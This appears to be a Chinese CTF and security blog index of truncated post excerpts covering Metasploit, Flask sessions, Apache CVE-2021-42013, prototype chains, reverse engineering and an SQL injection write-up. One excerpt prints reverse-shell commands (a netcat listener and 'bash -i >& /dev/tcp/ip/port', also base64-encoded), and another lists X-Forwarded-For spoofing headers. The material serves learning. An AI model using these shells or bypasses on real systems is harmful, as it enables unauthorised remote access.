Metasploit 模块辅助模块 Auxiliary Kali 路径：/usr/share/metasploit-framework/modules/auxiliary Mac 路径：/opt/metasploit-framework...

flask 的 session 格式flask 的 session 格式一般是由下面三个部分组成 1base64 加密的 session 数据（json、zlib 压缩处理的字符串） . 时间戳 . 签名 时间戳：用来告诉服务端数据最后一次更新的时间 签名：是利用 Hmac 算法，将 session 数据和...

ApacheApache HTTP 2.4.50 路径穿越漏洞 漏洞编号：CVE-2021-42013 影响范围：2.4.49 - 2.4.50 漏洞描述：由 CVE-2021-41773 的不完整修复导致的漏洞，攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件 漏洞扫描使用 nucl...

Javascript 原型链 JavaScript 常被描述为一种基于原型的语言 (prototype-based language)——每个对象拥有一个原型对象，对象以其原型为模板、从原型继承方法和属性。原型对象也可能拥有原型，并从中继承方法和属性，一层一层、以此类推。这种关系常被称为原型链 (prototyp...

本地访问 XFF 头12345678910111213141516171819202122232425X-Forwarded-For: 127.0.0.1X-Forwarded: 127.0.0.1Forwarded-For:127.0.0.1Forwarded: 127.0.0.1X-Requested-Wit...

开启监听123nc -lvvp 9999# or nc -lvvnp 9999 bash12bash -i >& /dev/tcp/ip/port 0>&1bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=&...

逆向中常见的加密算法base 系列base64 编码过程 如上图所示： 将字符串转换成二进制序列 按每 6 个二进制位为一组，分成若干组 如果不足 6 位，则最低位补 0 每 6 位组成一个新的字节，高位补 00，构成一个新的二进制序列 根据 base64 索引表中的值找到对应的字符 凑齐 4 字节整数倍，...

pyinstxtractor 解包 exe 文件1python pyinstxtractor.py pyexe.exe pyc 文件反编译pyc 文件格式可以通过 010Editor 打开 pyc 文件查看，pyc 文件的格式为： 4 个字节的 magic number （小端形式） 12个字节的源代码文件信...

[SUCTF 2019] EasySQL 1思路 猜后端代码并拼凑 思路别拘泥于时间盲注、报错注入 结果手工盲注发现过滤了 extractvalue、union、sleep 等关键词，并且输入字符无回显，所以没办法使用布尔盲注、时间盲注 测试输入数字的时候显示 Array ( [0] => 1 ) ，那...

z3 模块创建未知变量 声明整型 Int 123x = Int('x')a, s, d = Ints('a s d') # 一次全部列出v = [Int(f'v{i}') for i in range(len(s))] #...